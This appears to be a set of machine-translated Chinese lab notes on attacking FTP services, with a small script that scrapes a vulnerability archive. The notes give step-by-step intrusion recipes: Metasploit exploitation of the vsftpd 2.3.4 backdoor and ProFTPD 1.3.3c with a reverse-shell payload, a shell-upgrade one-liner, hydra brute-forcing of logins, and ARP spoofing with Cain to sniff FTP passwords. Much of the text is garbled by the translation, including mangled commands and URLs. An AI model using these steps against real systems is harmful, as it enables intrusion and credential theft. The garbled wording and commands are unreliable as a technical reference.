Port services and service -ftp
1 Overview
1.1. From the prophet and climb the clouds to take the historical port vulnerability reports, summary reports
1.2. Comprehensive summary, issued a summary table like
2.ftp
# -*- coding: utf-8 -*-
import requests,re,sys
def wooyun_chax(keywords,page):
url = "https://wooyun.x10sec.org/search?keywords="+keywords+"&&content_search_by=by_bugs&&search_by_html=False&&page="+page
print(url)
req = requests.get(url)
text = req.text
r = re.findall('<td><a href="(.*?)" target="_blank">\s(.*?)</a>',text)
for i in r:
print("漏洞名称:"+i[1])
print("漏洞链接:"+"https://wooyun.x10sec.org/"+i[0])
print("漏洞总结:")
wooyun_chax(sys.argv[1],sys.argv[2])
2.1 ftp搭建
iis build
1. Install the ftp service: Control Panel - Programs and Features - open or close the windows function -internet information service -ftp service
2. Query ftp service: Computer - Management -iis
3. Create an ftp site: Right - add ftp site - fill domain name / directory - ports and IP- permission settings
4. start
FileZillaServer build
1. Install: FileZillaServer- Baidu search download - installed, open
2. Set: Open - set the port -edit-users-shared folders set up directory - add a user to set a password -general
3. Review the log: edit-settings
2.2 typical case columns
1. HTTP backdoor the vsftpd S:. //Www.freebuf COM / column / 143480.html
to sum up
1. Search: Zhong Kui Eye Search Product: vsftpd 2.3.4
2.nmap vulnerability detection: nmap --script = vuln and anonymous tips can be anonymous login
3.msf attack
1.Use exploit / UNIX / the FTP / vsftpd_234_backdoor
2.set rhost and rport
3.exploit attack
4. create a user, provide the right
2.ftp overflow remote code HTTP S: //blog.csdn.net/weixin_42214273/article/details/ 82,892,282
to sum up
1. Environment: drone attack aircraft 192.168.88.165 192.168.88.138
2. Scanning: nmap -sV 192.168.88.165 scanning services and version
nmap -A -v 192.168.88.165 scanning all of the information difficult to use
nmap -O 192.168.88.165 detection range the operating system type and version
3 have found the service: the FTP proftpd 1.3.3c
4. in kali search for vulnerabilities: searchsploit proFTPD 1.3.3c not found
5.msf search for loopholes in the corresponding module: search proFTPD 1.3.3c
configuration 1. sET set payload cmd payload / UNIX / Reverse
2. set lhost and rhost
3.exploit attack
4.id See
5. port optimization: -C Python "Import Pty; pty.spawn ( '/ bin / the bash')"
6. The Get flag: general flag placed in the root cd / root
3.ftp jump attack. HTTP S: //blog.csdn.net/mgxcool/article/details/ 48,249,473
2.3 attack
ftp://192.168.43.85 1. Enter uname and paw normal landing, garbled. Solution: Control Panel - Regional and Language - the current system locale - is set to Chinese (Simplified Chinese)
2. Anonymous Access user name: anonymous Password: empty or any mailbox
3. Direct access
4. violence guess solution hydra 192.168.43.85 ftp -L username.txt -P pwd.txt -o 111.txt
5. backdoor vsftpd
6.ftp remote code overflow
7. Jump Attack
8. cain sniffer sniffer ftp password
2.4 cain sniffer ftp password
1. Set the card set cain-configure-sniffer- select the card for sniffing
arp can set up fake ip and mac address
port filters and ports- set sniffer port
2. Operating find spoofed IP: Click sniffer -scan mac address- open arp page - select spoofed IP
click sniffing
result: passwords of password displayed at crawl